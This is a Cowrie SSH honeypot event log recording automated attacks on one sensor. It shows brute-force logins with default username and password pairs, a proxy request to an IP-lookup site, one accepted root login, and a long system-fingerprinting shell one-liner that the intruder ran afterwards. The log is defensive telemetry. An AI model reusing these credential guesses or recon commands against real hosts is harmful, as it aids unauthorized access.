{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:58:27.665351Z","session":"5dd7c7f5182a"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"abc123","message":"login attempt [ftp/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:28.069942Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:58:28.611073Z","src_ip":"212.227.235.229","session":"5dd7c7f5182a"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:29.084343Z","src_ip":"212.227.235.229","session":"5dd7c7f5182a"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:29.122271Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52898,"dst_ip":"1.2.3.4","dst_port":22,"session":"44a3b21b2b35","protocol":"ssh","message":"New connection: 212.227.235.229:52898 (1.2.3.4:22) [session: 44a3b21b2b35]","sensor":"my-vps","timestamp":"2025-08-31T04:58:32.681341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:33.017226Z","src_ip":"212.227.235.229","session":"44a3b21b2b35"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:33.113524Z","src_ip":"212.227.235.229","session":"44a3b21b2b35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52908,"dst_ip":"1.2.3.4","dst_port":22,"session":"075242ddbf99","protocol":"ssh","message":"New connection: 212.227.235.229:52908 (1.2.3.4:22) [session: 075242ddbf99]","sensor":"my-vps","timestamp":"2025-08-31T04:58:34.280419Z"}
{"eventid":"cowrie.login.failed","username":"sconsole","password":"12345","message":"login attempt [sconsole/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:34.379681Z","src_ip":"212.227.235.229","session":"44a3b21b2b35"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:35.210637Z","src_ip":"212.227.235.229","session":"075242ddbf99"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:35.298310Z","src_ip":"212.227.235.229","session":"075242ddbf99"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:35.641965Z","src_ip":"212.227.235.229","session":"44a3b21b2b35"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:37.055842Z","src_ip":"212.227.235.229","session":"075242ddbf99"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:38.335593Z","src_ip":"212.227.235.229","session":"075242ddbf99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42882,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fc6e881ec7a","protocol":"ssh","message":"New connection: 212.227.235.229:42882 (1.2.3.4:22) [session: 5fc6e881ec7a]","sensor":"my-vps","timestamp":"2025-08-31T04:58:38.983658Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53094,"dst_ip":"1.2.3.4","dst_port":22,"session":"30548305ef70","protocol":"ssh","message":"New connection: 212.227.235.229:53094 (1.2.3.4:22) [session: 30548305ef70]","sensor":"my-vps","timestamp":"2025-08-31T04:58:40.460985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:58:41.417782Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:58:41.418925Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55540,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dc6a40ac881","protocol":"ssh","message":"New connection: 212.227.235.229:55540 (1.2.3.4:22) [session: 4dc6a40ac881]","sensor":"my-vps","timestamp":"2025-08-31T04:58:42.949803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:42.950731Z","src_ip":"212.227.235.229","session":"4dc6a40ac881"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:43.191441Z","src_ip":"212.227.235.229","session":"4dc6a40ac881"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"webadmin","message":"login attempt [webadmin/webadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:45.467380Z","src_ip":"212.227.235.229","session":"4dc6a40ac881"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:58:46.319222Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:46.451767Z","src_ip":"212.227.235.229","session":"f34f52c6b0ee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:58:46.504454Z","src_ip":"212.227.235.229","session":"5fc6e881ec7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:58:46.505251Z","src_ip":"212.227.235.229","session":"5fc6e881ec7a"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:46.708805Z","src_ip":"212.227.235.229","session":"4dc6a40ac881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:58:47.778142Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.778878Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.779316Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.780337Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.781453Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.782195Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.782948Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.783716Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.784219Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.784844Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.785381Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.785959Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.786390Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46530,"dst_ip":"1.2.3.4","dst_port":22,"session":"8db4245810d4","protocol":"ssh","message":"New connection: 212.227.235.229:46530 (1.2.3.4:22) [session: 8db4245810d4]","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.869833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:58:47.875529Z","src_ip":"212.227.235.229","session":"8db4245810d4"}
